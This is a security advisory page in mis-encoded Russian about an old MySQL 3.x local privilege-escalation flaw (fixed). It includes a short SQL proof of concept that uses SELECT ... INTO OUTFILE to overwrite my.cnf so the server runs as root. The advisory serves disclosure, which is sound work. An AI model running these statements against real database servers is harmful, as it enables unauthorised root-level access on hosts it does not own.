»зменение MySQL пользовател€

ƒата публикации:
11.03.2003
ƒата изменени€:
06.05.2008
¬сего просмотров:
881
ќпасность:
Ќизка€
Ќаличие исправлени€:
ƒа
 оличество у€звимостей:
1
CVSSv2 рейтинг:
CVE ID:
Ќет данных
¬ектор эксплуатации:
Ћокальна€
¬оздействие:
ѕовышение привилегий
CWE ID:
Ќет данных
Ќаличие эксплоита:
Ќет данных
”€звимые продукты:
MySQL 3.x
ќписание: ”€звимость обнаружена в базе данных MySQL. Ћокальный пользователь может заставить mySQL запускатьс€ от любого пользовател€, включа€ root.

 ак сообщаетс€, локальный пользователь может использовать операцию УSELECT * INTOФ, чтобы изменить my.cnf файл и заставить mySQL запускатьс€ под любым пользователем, включа€ root. ѕример:

mysql>CREATE DATABASE roottext;
mysql>USE roottext;
mysql>CREATE TABLE hack (conf VARCHAR(80));
mysql>INSERT IN hack VALUES ('[mysqld]');
mysql>INSERT IN hack VALUES ('user=root');
mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack
mysql>QUIT
”€звимость проверена в MySQL 3.23.55, возможно другие версии также у€звимы

—сылки: MySQL user can be changed to root
или введите им€

CAPTCHA